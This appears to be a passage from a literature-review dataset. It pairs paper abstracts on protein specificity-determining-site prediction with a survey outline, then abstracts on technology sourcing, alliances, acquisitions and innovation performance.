range of analysis and data visualization tools when compared with the original standalone version of the SPEER algorithm. Extensive benchmarking finds that SPEER-SERVER exhibits sensitivity and precision performance that, on average, meets or exceeds that of other currently available methods. SPEER-SERVER is available at http://www.hpppi.iicb.res.in/ss/. --- paper_title: Characterization and prediction of residues determining protein functional specificity paper_content: Motivation: Within a homologous protein family, proteins may be grouped into subtypes that share specific functions that are not common to the entire family. Often, the amino acids present in a small number of sequence positions determine each protein's particular function-al specificity. Knowledge of these specificity determining positions (SDPs) aids in protein function prediction, drug design and experimental analysis. A number of sequence-based computational methods have been introduced for identifying SDPs; however, their further development and evaluation have been hindered by the limited number of known experimentally determined SDPs. ::: ::: Results: We combine several bioinformatics resources to automate a process, typically undertaken manually, to build a dataset of SDPs. The resulting large dataset, which consists of SDPs in enzymes, enables us to characterize SDPs in terms of their physicochemical and evolution-ary properties. It also facilitates the large-scale evaluation of sequence-based SDP prediction methods. We present a simple sequence-based SDP prediction method, GroupSim, and show that, surprisingly, it is competitive with a representative set of current methods. We also describe ConsWin, a heuristic that considers sequence conservation of neighboring amino acids, and demonstrate that it improves the performance of all methods tested on our large dataset of enzyme SDPs. ::: ::: Availability: Datasets and GroupSim code are available online at http://compbio.cs.princeton.edu/specificity/ ::: ::: Contact: [email protected] ::: ::: Supplementary information:Supplementary data are available at Bioinformatics online. --- paper_title: Phylogeny-independent detection of functional residues paper_content: Motivation: Current projects for the massive characterization of proteomes are generating protein sequences and structures with unknown function. The difficulty of experimentally determining functionally important sites calls for the development of computational methods. The first techniques, based on the search for fully conserved positions in multiple sequence alignments (MSAs), were followed by methods for locating family-dependent conserved positions. These rely on the functional classification implicit in the alignment for locating these positions related with functional specificity. The next obvious step, still scarcely explored, is to detect these positions using a functional classification different from the one implicit in the sequence relationships between the proteins. Here, we present two new methods for locating functional positions which can incorporate an arbitrary external functional classification which may or may not coincide with the one implicit in the MSA. The Xdet method is able to use a functional classification with an associated hierarchy or similarity between functions to locate positions related to that classification. The MCdet method uses multivariate statistical analysis to locate positions responsible for each one of the functions within a multifunctional family. ::: ::: Results: We applied the methods to different cases, illustrating scenarios where there is a disagreement between the functional and the phylogenetic relationships, and demonstrated their usefulness for the phylogeny-independent prediction of functional positions. ::: ::: Availability: All computer programs and datasets used in this work are available from the authors for academic use. ::: ::: Contact: [email protected] ::: ::: Supplementary information: Supplementary data are available at http://pdg.cnb.uam.es/pazos/Xdet_MCdet_Add/ --- paper_title: SPEER-SERVER: a web server for prediction of protein specificity determining sites paper_content: Sites that show specific conservation patterns within subsets of proteins in a protein family are likely to be involved in the development of functional specificity. These sites, generally termed specificity determining sites (SDS), might play a crucial role in binding to a specific substrate or proteins. Identification of SDS through experimental techniques is a slow, difficult and tedious job. Hence, it is very important to develop efficient computational methods that can more expediently identify SDS. Herein, we present Specificity prediction using amino acids’ Properties, Entropy and Evolution Rate (SPEER)-SERVER, a web server that predicts SDS by analyzing quantitative measures of the conservation patterns of protein sites based on their physico-chemical properties and the heterogeneity of evolutionary changes between and within the protein subfamilies. This web server provides an improved representation of results, adds useful input and output options and integrates a wide range of analysis and data visualization tools when compared with the original standalone version of the SPEER algorithm. Extensive benchmarking finds that SPEER-SERVER exhibits sensitivity and precision performance that, on average, meets or exceeds that of other currently available methods. SPEER-SERVER is available at http://www.hpppi.iicb.res.in/ss/. --- paper_title: Ensemble approach to predict specificity determinants: benchmarking and validation paper_content: BackgroundIt is extremely important and challenging to identify the sites that are responsible for functional specification or diversification in protein families. In this study, a rigorous comparative benchmarking protocol was employed to provide a reliable evaluation of methods which predict the specificity determining sites. Subsequently, three best performing methods were applied to identify new potential specificity determining sites through ensemble approach and common agreement of their prediction results.ResultsIt was shown that the analysis of structural characteristics of predicted specificity determining sites might provide the means to validate their prediction accuracy. For example, we found that for smaller distances it holds true that the more reliable the prediction method is, the closer predicted specificity determining sites are to each other and to the ligand.ConclusionWe observed certain similarities of structural features between predicted and actual subsites which might point to their functional relevance. We speculate that majority of the identified potential specificity determining sites might be indirectly involved in specific interactions and could be ideal target for mutagenesis experiments. --- paper_title: Functional specificity lies within the properties and evolutionary changes of amino acids. paper_content: The rapid increase in the amount of protein sequence data has created a need for automated identification of sites that determine functional specificity among related subfamilies of proteins. A significant fraction of subfamily specific sites are only marginally conserved, which makes it extremely challenging to detect those amino acid changes that lead to functional diversification. To address this critical problem we developed a method named SPEER (specificity prediction using amino acids' properties, entropy and evolution rate) to distinguish specificity determining sites from others. SPEER encodes the conservation patterns of amino acid types using their physico-chemical properties and the heterogeneity of evolutionary changes between and within the subfamilies. To test the method, we compiled a test set containing 13 protein families with known specificity determining sites. Extensive benchmarking by comparing the performance of SPEER with other specificity site prediction algorithms has shown that it performs better in predicting several categories of subfamily specific sites. --- paper_title: Characterization and prediction of residues determining protein functional specificity paper_content: Motivation: Within a homologous protein family, proteins may be grouped into subtypes that share specific functions that are not common to the entire family. Often, the amino acids present in a small number of sequence positions determine each protein's particular function-al specificity. Knowledge of these specificity determining positions (SDPs) aids in protein function prediction, drug design and experimental analysis. A number of sequence-based computational methods have been introduced for identifying SDPs; however, their further development and evaluation have been hindered by the limited number of known experimentally determined SDPs. ::: ::: Results: We combine several bioinformatics resources to automate a process, typically undertaken manually, to build a dataset of SDPs. The resulting large dataset, which consists of SDPs in enzymes, enables us to characterize SDPs in terms of their physicochemical and evolution-ary properties. It also facilitates the large-scale evaluation of sequence-based SDP prediction methods. We present a simple sequence-based SDP prediction method, GroupSim, and show that, surprisingly, it is competitive with a representative set of current methods. We also describe ConsWin, a heuristic that considers sequence conservation of neighboring amino acids, and demonstrate that it improves the performance of all methods tested on our large dataset of enzyme SDPs. ::: ::: Availability: Datasets and GroupSim code are available online at http://compbio.cs.princeton.edu/specificity/ ::: ::: Contact: [email protected] ::: ::: Supplementary information:Supplementary data are available at Bioinformatics online. --- paper_title: Sequence analysis Multi-RELIEF : a method to recognize specificity determining residues from multiple sequence alignments using a Machine-Learning approach for feature weighting paper_content: Motivation: Identification of residues that account for protein function specificity is crucial, not only for understanding the nature of functional specificity, but also for protein engineering experiments aimed at switching the specificity of an enzyme, regulator or transporter. Available algorithms generally use multiple sequence alignments to identify residue positions conserved within subfamilies but divergent in between. However, many biological examples show a much subtler picture than simple intra-group conservation versus inter-group divergence. ::: ::: Results: We present multi-RELIEF, a novel approach for identifying specificity residues that is based on RELIEF, a state-of-the-art Machine-Learning technique for feature weighting. It estimates the expected ‘local’ functional specificity of residues from an alignment divided in multiple classes. Optionally, 3D structure information is exploited by increasing the weight of residues that have high-weight neighbors. Using ROC curves over a large body of experimental reference data, we show that (a) multi-RELIEF identifies specificity residues for the seven test sets used, (b) incorporating structural information improves prediction for specificity of interaction with small molecules and (c) comparison of multi-RELIEF with four other state-of-the-art algorithms indicates its robustness and best overall performance. ::: ::: Availability: A web-server implementation of multi-RELIEF is available at www.ibi.vu.nl/programs/multirelief. Matlab source code of the algorithm and data sets are available on request for academic use. ::: ::: Contact: [email protected] ::: ::: Supplementary information: Supplemenmtary data are available at Bioinformatics online ---
Title: A survey on prediction of specificity-determining sites in proteins Section 1: INTRODUCTION Description 1: Introduce the field and context of specificity-determining sites (SDS) in proteins, the evolutionary theories behind them, and the various challenges in identifying these sites computationally. Section 2: STATUS OF THE FIELD Existing algorithms for SDS prediction Description 2: Discuss the status and development of various computational approaches used for SDS prediction, including early approaches, entropy-based methods, evolutionary rate-based methods, automated subgrouping, 3D structure-based methods, machine learning techniques, and ensemble approaches. Section 3: Performance of SDS-predicting algorithms Description 3: Assess the performance of different SDS prediction algorithms using various metrics like sensitivity, accuracy, F score, MCC, and area under the curve (AUC). Section 4: Effective benchmarking of SDS prediction algorithms Description 4: Present an exhaustive and objective benchmarking analysis of the existing SDS prediction methods using multiple data sets of various sizes and biological functions. Section 5: Overall performance of SDS prediction programs Description 5: Analyze the overall performance of the reviewed SDS prediction programs, focusing on their strengths and weaknesses in predicting different types of SDS and their efficiency in various conservation spectra. Section 6: Comparison of performance based on biological functions Description 6: Compare the performance of SDS prediction programs across different biological functions and data sets, including enzyme classes and non-enzyme classes. Section 7: Influence of subfamily number Description 7: Examine how the number of subfamilies in a protein sequence alignment affects the variability and complexity of identifying SDS, and the performance of prediction algorithms in such scenarios. Section 8: CONCLUSION Description 8: Summarize the findings from the review, detailing the progress made in the field, the best performing approaches, and the future directions for both computational and experimental efforts in SDS prediction. Section 9: SUPPLEMENTARY DATA Description 9: Mention the availability of supplementary data online for extended analysis and additional details pertaining to the reviewed prediction methods and benchmarking studies. Section 10: Key Points Description 10: Highlight key points from the review, summarizing critical aspects and the importance of predicting specificity-determining sites in proteins.
The impact of internal and external technology sourcing on innovation performance: a review and research agenda
10
--- paper_title: External Technology Sourcing Through Alliances or Acquisitions: An Analysis of the Application-Specific Integrated Circuits Industry paper_content: In today's turbulent business environment innovation is the result of the interplay between two distinct but related factors: endogenous R&D efforts and (quasi) external acquisition of technology and know-how. Given the increasing importance of innovation, it is vital to understand more about the alternative mechanisms--such as alliances and acquisitions--that can be used to enhance the innovative performance of companies. Most of the literature has dealt with these alternatives as isolated issues. Companies, however, are constantly challenged to choose between acquisitions and strategic alliances, given the limited resources that can be spent on research and development. This paper contributes to the literature because it focuses on the choice between innovation-related alliances and acquisitions. We focus on the question of how the trade-off between strategic alliances and acquisitions is influenced by previous direct and indirect ties between firms in an industry network of interfirm alliances. We formulate hypotheses pertaining to the number of direct ties between two companies, their proximity in the overall alliance network, and their centrality in that network. In so doing, we distinguish between ties that connect firms from the same and from different industry segments, and those that connect firms from the same or from different world regions. These hypotheses are tested on a sample of strategic alliances and acquisitions in the application-specific integrated circuits (ASIC) industry. The findings show that a series of strategic alliances between two partners increases the probability that one will ultimately acquire the other. Whereas previous direct contacts tend to lead to an acquisition, this is not true of previous indirect contacts, which increase the probability that a link between the companies, once it is forged, takes the form of a strategic alliance. In the case of acquisitions, firms that are more centrally located in the network of interfirm alliances tend to be acquirers, and firms with a less central position tend to become acquired. These findings underscore the importance of taking previously formed interfirm linkages into account when explaining the choice between strategic alliances and acquisitions, as these existing links influence the transaction costs associated with both alternatives. --- paper_title: External technology sourcing and innovation performance in LMT sectors: An analysis based on the Taiwanese Technological Innovation Survey paper_content: This paper presents the strategies that low- and medium-technology (LMT) firms adopt to generate technological innovation and investigates the impact of these approaches on the firms' innovation performances. These analyses are based on a sample from the Taiwanese Technological Innovation Survey totalling 753 LMT firms. The descriptive statistics show that about 95% of the firms acquired technology by technology licensing, while 32% of the firms engaged in R&D outsourcing. The firms in the sample acquiring external technological knowledge through collaboration with suppliers, clients, competitors, and research organizations are about 20%, 18%, 8%, and 23%, respectively. Using a moderated hierarchical regression analysis, this study reveals interesting results. First, inward technology licensing does not contribute significantly to innovation performance. Second, internal R&D investment negatively moderates the effect of R&D outsourcing on innovation performance. Third, internal R&D investment contingently impacts the different types of partners on innovation performance: by collaborating with different types of partners, firms with more internal R&D investment gain higher innovation returns than firms with fewer internal R&D activities. The results of this study contribute to a sharper understanding of technological innovation strategies and their effects on technological innovation performance in LMT sectors. --- paper_title: Collaboration and innovation: a review of the effects of mergers, acquisitions and alliances on innovation paper_content: Over the past decades, a strong upheaval in the use of alternative forms of organization gave way to increased attention in the academic literature to the performance effects of, in particular, strategic alliances and mergers and acquisitions (M&A). Whereas mergers and acquisitions and strategic alliances are primarily known for their ability to facilitate entry into new markets and their effectiveness in achieving scale and scope economies we would like to focus on their effects on the innovative performance of companies involved. In spite of the vast and rapidly growing body of literature on the use and structure of strategic alliances and mergers and acquisitions, there are hardly any studies that address the question of whether one mode of partnering is superior to the other in terms of strengthening the innovative capabilities of the partners involved. Moreover, no extensive review of the empirical literature on this specific research topic is available. Given the growing importance of innovation for the competitive position of companies (Porter, 1990) and the fact that innovation is shown to be one of the driving forces of 20th century growth (Franko, 1989) it is of eminent importance that we study the effect of alternative governance mechanisms on the innovative performance of companies (Vanhaverbeke et al., 2002). Since, no general conclusions have been drawn based on the existing literature, knowledge accumulation is inhibited. It is unclear which research questions have already been answered and which are still open for further exploration. The lack of a coherent overview also implies that practitioners have no empirically validated guidelines when preparing for the best mode of organizing for innovation. Should managers opt for M&A or an alliance if they intend to increase innovation? What specific circumstances affect this choice? What type of alliance is best suited to a particular situation? The absence of an exhausting overview of empirical findings so far, makes it impossible to even begin answering these questions. Hence, there is a necessity for a review of empirical studies on the effect of M&A versus alliances on innovation. --- paper_title: AN EVOLUTIONARY PERSPECTIVE ON DIVERSIFICATION AND CORPORATE RESTRUCTURING: ENTRY, EXIT, AND ECONOMIC PERFORMANCE DURING 1981-89 paper_content: This study proposes a theoretical perspective that firms engage in continuous search and selection activities in order to improve their knowledge base and thereby improve their performance. This general framework is applied to the context of corporate evolution. Entry and exit activities are understood as search and selection undertaken by the firm to improve their performance. One of the compelling features of this framework is that firms learn from their past entry experience and approach the next entry in a more focused and directed manner over time. Also, firms acquire additional knowledge from each entry event while applying their existing knowledge base. With a longitudinal (1981-89) data base on entry and exit activities of all publicly traded manufacturing firms in the United States, this study shows that applicability of the firm's knowledge base plays an important role in predicting which businesses a firm enters or exits. Finns sequentially enter businesses of similar human resource profiles and firms are more likely to divest lines of business of different profiles. Corporate-level analysis shows that such well-directed entry and exit contribute to the improvement of a firm's profitability. --- paper_title: The Effect of Governance Modes and Relatedness of External Business Development Activities on Innovative Performance paper_content: This study examines how different governance modes for external business development activities and venture relatedness affect a firm's innovative performance. Building on research suggesting that interorganizational relationships enhance the innovative performance of firms, we propose that governance modes and venture relatedness interact in their effect on innovative performance. Analyzing a panel of the largest firms in four information and communication technology sectors, we find that degree of relatedness for corporate venture capital investments, alliances, joint ventures, and acquisitions influences their impact on innovative performance. Copyright © 2008 John Wiley & Sons, Ltd. --- paper_title: Network location and learning: the influence of network resources and firm capabilities on alliance formation paper_content: This paper presents a dynamic, firm-level study of the role of network resources in determining alliance formation. Such resources inhere not so much within the firm but reside in the interfirm networks in which firms are placed. Data from extensive fieldwork show that by influencing the extent to which firms have access to information about potential partners, such resources are an important catalyst for new alliances, especially because alliances entail considerable hazards. This study also assesses the importance of firms’ capabilities with alliance formation and material resources as determinants of their alliance decisions. I test this dynamic framework and its hypotheses about the role of time-varying network resources and firm capabilities with comprehensive longitudinal multi-industry data on the formation of strategic alliances by a panel of firms between 1970 and 1989. The results confirm field observations that accumulated network resources arising from firm participation in the network of accumulated prior alliances are influential in firms’ decisions to enter into new alliances. This study highlights the importance of network resources that firms derive from their embeddedness in networks for explaining their strategic behavior. Copyright © 1999 John Wiley & Sons, Ltd. --- paper_title: Managing Mergers Across Borders: a Two-Nation Exploration of a Nationally Bound Administrative Heritage paper_content: Top managers of British and French firms, which were recently acquired by either British or French firms, were surveyed as to their perceptions of the administrative approach-reflected in integrating mechanisms-used by the acquiring firms to establish headquarters-subsidiary control. Four types of integrative mechanisms were examined: structural, systems, social, and managerial. A multiple analysis of covariance model, coupled with a two-nation (British and French), two-merger type (domestic, cross-national) sampling design, found evidence that the administrative approaches used by managers during merger integration from two nations partially reflect their different heritages, and that these differences are consistent with national differences and the theoretical perspectives of institutional development and cross-cultural studies. Our findings, while exploratory, provide insight into the administrative difficulties of managing across borders and help us understand why many cross-national firms continue to use ethnocentric approaches in spite of the incentives for adopting a transnational approach. Moreover, our findings add one more voice to a growing chorus calling for a theory of the firm, as embedded, institutionally, culturally, and historically. --- paper_title: Overcoming Local Search Through Alliances and Mobility paper_content: Recent research suggests that, due to organizational and relational constraints, firms are limited contextually--both geographically and technologically--in their search for new knowledge. But distant contexts may offer ideas and insights that can be extremely useful to innovation through knowledge recombination. So how can firms reach beyond their existing contexts in their search for new knowledge? In this paper, we suggest that two mechanisms--alliances and the mobility of inventors--can serve as bridges to distant contexts and, thus, enable firms to overcome the constraints of contextually localized search.Through the analysis of patent citation patterns in the semiconductor industry, we first demonstrate both the geographic and technological localization of knowledge. We then explore if the formation of alliances and mobility of active inventors facilitate interfirm knowledge flows across contexts. We find that mobility is associated with interfirm knowledge flows regardless of geographic proximity and, in fact, the usefulness of alliances and mobility increases with technological distance. These findings suggest that firms can employ knowledge acquisition mechanisms to fill in the holes of their existing technological and geographic context. --- paper_title: Multinational Corporations and European Regional Systems of Innovation paper_content: In globalising economies, particularly those going through a process of economic integration such as those economies within the EU, regions forge an increasing number of linkages with other locations within and across national borders. This is largely carried out by the technological efforts of Multinational Corporations (MNCs). This book explores the regional dimension of Europe in terms of localised technological comparative advantages and the location of innovative activities by MNCs. Using an empirical analysis John Cantwell and Simona Iammarino cover such important themes as: *MNC technological activities and economic wealth *MNCs and the regional systems of innovation in Italy, UK, Germany and France *the geographical hierarchy across European national borders. --- paper_title: Towards understanding who makes corporate venture capital investments and why paper_content: This study examines when established firms participate in corporate venture capital (CVC). We build on the resource-based view of interfirm collaboration and emphasize the strategic flexibility of CVC relationships. We use longitudinal data on 477 firms from 1990 to 2000 to test our hypotheses. We find that firms in industries with rapid technological change, high competitive intensity and weak appropriability engage in greater CVC activity. We also show that firms that possess strong technological and marketing resources and resources developed from diverse venturing experience engage in greater CVC activity. Finally, we find that these firm resources moderate the influence of the observed industry effects in paradoxical ways. --- paper_title: Evolutionary trajectories in petroleum firm R&D paper_content: Tacit knowledge and cumulative learning underlie an evolutionary theory of business firm development and strategy. As one test case of the theory, this study examines firms' applied research and development activities. Evolutionary theory suggests that firms within an industry will tend both to persist and to differ in the amount of effort they devote to various R&D applications. A test of the hypothesis of presistent differences in R&D, using uniquely detailed data from the petroleum industry, provides support for evolutionary theory. --- paper_title: Something Old, Something New: A Longitudinal Study of Search Behavior and New Product Introduction paper_content: We examine how firms search, or solve problems, to create new products. According to organizational learning research, firms position themselves in a unidimensional search space that spans a spectrum from local to distant search. Our findings in the global robotics industry suggest that firms' search efforts actually vary across two distinct dimensions: search depth, or how frequently the firm reuses its existing knowledge, and search scope, or how widely the firm explores new knowledge. --- paper_title: Innovation Management Measurement: A Review paper_content: Measurement of the process of innovation is critical for both practitioners and academics, yet the literature is characterized by a diversity of approaches, prescriptions and practices that can be confusing and contradictory. Conceptualized as a process, innovation measurement lends itself to disaggregation into a series of separate studies. The consequence of this is the absence of a holistic framework covering the range of activities required to turn ideas into useful and marketable products. We attempt to address this gap by reviewing the literature pertaining to the measurement of innovation management at the level of the firm. Drawing on a wide body of literature, we first develop a synthesized framework of the innovation management process consisting of seven categories: inputs management, knowledge management, innovation strategy, organizational culture and structure, portfolio management, project management and commercialization. Second, we populate each category of the framework with factors empirically demonstrated to be significant in the innovation process, and illustrative measures to map the territory of innovation management measurement. The review makes two important contributions. First, it takes the difficult step of incorporating a vastly diverse literature into a single framework. Second, it provides a framework against which managers can evaluate their own innovation activity, explore the extent to which their organization is nominally innovative or whether or not innovation is embedded throughout their organization, and identify areas for improvement. --- paper_title: Towards a Methodology for Developing Evidence-Informed Management Knowledge by Means of Systematic Review paper_content: Undertaking a review of the literature is an important part of any research project. The researcher both maps and assesses the relevant intellectual territory in order to specify a research question which will further develop the knowledge hase. However, traditional 'narrative' reviews frequently lack thoroughness, and in many cases are not undertaken as genuine pieces of investigatory science. Consequently they can lack a means for making sense of what the collection of studies is saying. These reviews can he hiased by the researcher and often lack rigour. Furthermore, the use of reviews of the available evidence to provide insights and guidance for intervention into operational needs of practitioners and policymakers has largely been of secondary importance. For practitioners, making sense of a mass of often-contrad ictory evidence has hecome progressively harder. The quality of evidence underpinning decision-making and action has heen questioned, for inadequate or incomplete evidence seriously impedes policy formulation and implementation. In exploring ways in which evidence-informed management reviews might be achieved, the authors evaluate the process of systematic review used in the medical sciences. Over the last fifteen years, medical science has attempted to improve the review process hy synthesizing research in a systematic, transparent, and reproducihie manner with the twin aims of enhancing the knowledge hase and informing policymaking and practice. This paper evaluates the extent to which the process of systematic review can be applied to the management field in order to produce a reliable knowledge stock and enhanced practice by developing context-sensitive research. The paper highlights the challenges in developing an appropriate methodology. --- paper_title: The Effects of Personal and Contextual Characteristics on Creativity: Where Should We Go from Here? paper_content: This article systematically reviews and integrates empirical research that has examined the personal and contextual characteristics that enhance or stifle employee creativity in the workplace. Based on our review, we discuss possible determinants of employee creativity that have received little research attention, describe several areas where substantial challenges and unanswered questions remain, present a number of new research directions for theory building, and identify methodological improvements needed in future studies of creativity in organizations. --- paper_title: A Multi-Dimensional Framework of Organizational Innovation: A Systematic Review of the Literature paper_content: This paper consolidates the state of academic research on innovation. Based on a systematic review of literature published over the past 27 years, we synthesize various research perspectives into a comprehensive multi-dimensional framework of organizational innovation – linking leadership, innovation as a process, and innovation as an outcome. We also suggest measures of determinants of organizational innovation and present implications for both research and managerial practice. --- paper_title: PERSPECTIVE: Ranking the Technology Innovation Management Journals* paper_content: A citation analysis of the 10 leading technology and innovation management (TIM) specialty journals is conducted to gain insights into the relative ranking of the journals. The journals are ranked based on number of citations, citations adjusted for publication frequency, citations corrected for age, citations corrected for self-citation, and an overall score. The top 50 journals in management of technology based on citation analysis are listed. Overall, the top 10 journals based on citation analysis are Journal of Product Innovation Management, Research Policy, Research-Technology Management, Harvard Business Review, Strategic Management Journal, Management Science, Administrative Science Quarterly, RD how the journals relate to each other and the related implications of these findings are considered. --- paper_title: Leveraging External Sources of Innovation: A Review of Research on Open Innovation paper_content: This article reviews research on open innovation that considers how and why firms commercialize external sources of innovations. It examines both the “outside-in” and “coupled” modes of Enkel et al. (2009). From an analysis of prior research on how firms leverage external sources of innovation, it suggests a four-phase model in which a linear process — (1) obtaining, (2) integrating and (3) commercializing external innovations — is combined with (4) interaction between the firm and its collaborators. This model is used to classify papers taken from the top 25 innovation journals identified by Linton and Thongpapan (2004), complemented by highly cited work beyond those journals. A review of 291 open innovation-related publications from these sources shows that the majority of these articles indeed address elements of this inbound open innovation process model. Specifically, it finds that researchers have front-loaded their examination of the leveraging process, with an emphasis on obtaining innovations from external sources. However, there is a relative dearth of research related to integrating and commercializing these innovations.Research on obtaining innovations includes searching, enabling, filtering, and acquiring — each category with its own specific set of mechanisms and conditions. Integrating innovations has been mostly studied from an absorptive capacity perspective, with less attention given to the impact of competencies and culture (including not-invented-here). Commercializing innovations puts the most emphasis on how external innovations create value rather than how firms capture value from those innovations. Finally, the interaction phase considers both feedback for the linear process and reciprocal innovation processes such as co-creation, network collaboration and community innovation.This review and synthesis suggests several gaps in prior research. One is a tendency to ignore the importance of business models, despite their central role in distinguishing open innovation from earlier research on inter-organizational collaboration in innovation. Another gap is a tendency in open innovation to use “innovation” in a way inconsistent with earlier definitions in innovation management. The article concludes with recommendations for future research that include examining the end-to-end innovation commercialization process, and studying the moderators and limits of leveraging external sources of innovation. --- paper_title: Innovation in Cities: Science-Based Diversity, Specialization and Localized Competition paper_content: Whether diversity or specialization of economic activity better promotes technological change and subsequent economic growth has been the subject of a heated debate in the economics literature. The purpose of this paper is to consider the effect of the composition of economic activity on innovation. We test whether the specialization of economic activity within a narrow concentrated set of economic activities is more conducive to knowledge spillovers or if diversity, by bringing together complementary activities, better promotes innovation. The evidence provides considerable support for the diversity thesis but little support for the specialization thesis. --- paper_title: The future of open innovation paper_content: Institutional openness is becoming increasingly popular in practice and academia: open innovation, open R&D and open business models. Our special issue builds on the concepts, underlying assumptions and implications discussed in two previous R&D Management special issues (2006, 2009). This overview indicates nine perspectives needed to develop an open innovation theory more fully. It also assesses some of the recent evidence that has come to light about open innovation, in theory and in practice. --- paper_title: Technological Platforms and Diversification paper_content: As the invention of fundamental new sciences spawns subsequent research, discovery, and commercialization, core technologies branch into new applications and markets. Some of them evolve over time into many derived technologies, whereas others are essentially “dead ends.” The pattern of evolution and branching is called a “technological trajectory.” An intriguing question is whether some firms can ride the trajectory by developing proprietary experience in a “platform technology.” Because the knowledge is proprietary, firms that originate in industrial fields based on a platform technology acquire the technological skills to diversify and to mimic the branching of the underlying technological trajectory.The ability to compete in hypercompetitive markets depends on the acquisition of know-how that is applicable to a wide set of market opportunities. Such capabilities serve as platforms into quickly evolving markets. To respond rapidly to market changes, a firm must have already acquired fundamental competitive knowledge. In a high-technology industry, such knowledge invariably is derived from experience with the underlying science and related technological fields.The authors examine capabilities as platforms by analyzing the temporal sequence of diversification as contingent on market opportunities and previous experience. The pattern of diversification of firms reflects the evolutionary branching of underlying technologies. In that sense, the aggregate decisions of firms are driven by the technological trajectories common across an industrial sector. Certain technologies have wider technological and market opportunities, and consequently experience in those technologies serves as a platform for expansion. The authors propose that a firm's experience in platform technologies increases the likelihood of diversification when environmental opportunities are favorable.The proposition is tested with the sample of 176 semiconductor startup companies founded between 1977 and 1989. Evidence from multidimensional scaling of expert opinion and from an analysis of patent records was gathered to identity relatedness among subfields and the evolutionary direction of the technologies. A discrete hazard model is specified to estimate the effect of technological histories on subsequent diversification. The results confirm the relationship between relatedness and directionality of technologies and the industrial path of diversification. The finding that diversification depends on technological experience and market opportunity has important implications for firms' entry decisions. The authors discuss those implications by describing experience as generating options on future opportunities and distinguishing between the historical path by which the stock of knowledge is accumulated and the path by which new knowledge is generated and commercialized. --- paper_title: Innovative competence, exploration and exploitation: The influence of technological diversification paper_content: This paper investigates how technological diversification influences the rate and specific types of innovative competence. We test a set of hypotheses in a longitudinal study of a sample of biotechnology firms. Our findings provide strong support for the premise that a diversified technology base positively affects innovative competence. Furthermore, technological diversification is found to have a stronger effect on exploratory than on exploitative innovative capability. This empirical evidence suggests that technological diversity may mitigate core rigidities and path dependencies by enhancing novel solutions that accelerate the rate of invention, especially that which departs from a firm's past activities. --- paper_title: Does Technological Diversification Promote Innovation? An Empirical Analysis for European Firms paper_content: Abstract This paper analyses the impact of technological diversity on innovative activity at the firm level. The empirical study on a panel of European R&D active companies shows that both R&D intensity and patents increase with the degree of technological diversification of the firm. Possible explanations are that, on the one hand, a firm that diversifies its technology can receive more spillovers from other (related) technological fields. On the other hand, diversification can reduce the risk from technological investments and it creates incentives to spend more on R&D. The paper provides empirical evidence relevant to the diversity-specialization innovation debate. --- paper_title: International Diversification: Effects on Innovation and Firm Performance in Product-Diversified Firms paper_content: Theory suggests and results show that firm performance is initially positive but eventually levels off and becomes negative as international diversification increases. Product diversification moderates the relationship between international diversification and performance. International diversification is negatively related to performance in nondiversified firms, positively related in highly product-diversified firms, and curvilinearly related in moderately product-diversified firms. International diversification is also positively related to R&D intensity, but the interaction effects with product diversification are negative. The results of this study provide evidence of the importance of international diversification for competitive advantage but also suggest the complexities of implementing it to achieve these advantages in product-diversified firms. --- paper_title: Technological diversity of persistent innovators in Japan Two case studies of large Japanese firms paper_content: We have investigated two large Japanese firms with their patent data, technological histories and product sales data of over 30 years especially in terms of intra-firm technology diversification and interactions between multiple technological trajectories. Patent data showed the process of emergencies of technological trajectories and interactions (cross-fertilization) between them quantitatively. Both persistence and diversity of technology have contributed to product diversification and sales growth. Based on our findings we have demonstrated that taking advantage of economies of scope in technology through persistence and diversification is necessary for a technology-based firm if it is to survive and to grow for a prolonged period of time. © 2003 Elsevier B.V. All rights reserved. --- paper_title: TOWARDS A THEORY OF THE TECHNOLOGY-BASED FIRM paper_content: Abstract The modern firm is a very viable economic institution, drawing strength from a competitive market economy, with embedded `super-markets' for corporate control and `sub-markets' for internal organization. The technology-based firm in addition draws strength from its co-evolution with modern science and technology (and vice versa), and thereby becomes increasingly important. However, received theories of the firm, of which there are many, have not particularly taken account of technology and technology-based firms, nor their management. This paper takes an empirical point of departure from recent findings regarding the positive relationship between technology diversification on the one hand and corporate growth and business diversification on the other. These findings are not readily explainable by received theories of the firm, which the paper reviews, and the findings are thus taken as an explanandum for a proposed approach to formulate a theory of the technology-based firm. The approach is compatible with various other theoretical approaches such as the resource-based, the transaction-cost and the evolutionary approach, but specifically takes the idiosyncrasies of technology (i.e., technical competence) as well as management into account. Through notably strong economies of scale, scope, speed and space associated with the combination of different technologies and resources, the technology-based firm is subjected to specific dynamics in its growth and diversification and shifts of businesses and resources. In particular, a technology-based firm tends to engage in technology diversification, thereby becoming multitechnological. As such the technology-based firm has incentives to economize on increasingly expensive new technologies by pursuing strategies of internationalization on both input and output markets, technology-related business diversification, external technology marketing and sourcing, R&D rationalization and technology-related partnering. --- paper_title: THE USE OF KNOWLEDGE FOR TECHNOLOGICAL INNOVATION WITHIN DIVERSIFIED FIRMS paper_content: We propose that searching for and transferring knowledge across divisions in a diversified firm can cultivate innovation. Using a sample of 211,636 patents from 1,644 companies during the period 1985–96, we find that the use of interdivisional knowledge positively affects the impact of an invention on subsequent technological developments. Furthermore, the positive effect of the use of interdivisional knowledge on the impact of an invention is stronger than the effect of using knowledge from within divisional boundaries or from outside firm boundaries. Our empirical findings have significant implications for the management of knowledge in diversified firms. --- paper_title: Knowledge-relatedness in firm technological diversification paper_content: Abstract This paper claims that knowledge-relatedness is a key factor in affecting firms’ technological diversification. The hypothesis is tested that firms extend the range of their innovative activities in a non-random way. Specifically, we test the extent to which firms diversify their innovative activities across related technological fields, i.e. fields that share a common knowledge base and rely upon common heuristics and scientific principles. The paper proposes an original measure of knowledge-relatedness, using co-classification codes contained in patent documents, and examines the patterns of technological diversification of the whole population of firms from the United States, Italy, France, UK, Germany, and Japan patenting to the European Patent Office from 1982 to 1993. Robust evidence is found that knowledge-relatedness is a major feature of firms’ innovative activities. --- paper_title: The Uncertain Relevance of Newness: Organizational Learning and Knowledge Flows paper_content: This study explores how organizational learning in subunits affects outflows of knowledge to other subunits. Three learning processes are explored: Collecting new knowledge, codifying knowledge, an... --- paper_title: Knowledge transfer in international acquisitions paper_content: This paper reports on a multimethod study of knowledge transfer in international acquisitions. Using questionnaire data we show that the transfer of technological know-how is facilitated by communication, visits & meetings, and by time elapsed since acquisition, while the transfer of patents is associated with the articulability of the knowledge, the size of the acquired unit, and the recency of the acquisition. Using case study data, we show that the immediate post-acquisition period is characterized by imposed one-way transfers of knowledge from the acquirer to the acquired, but over time this gives way to 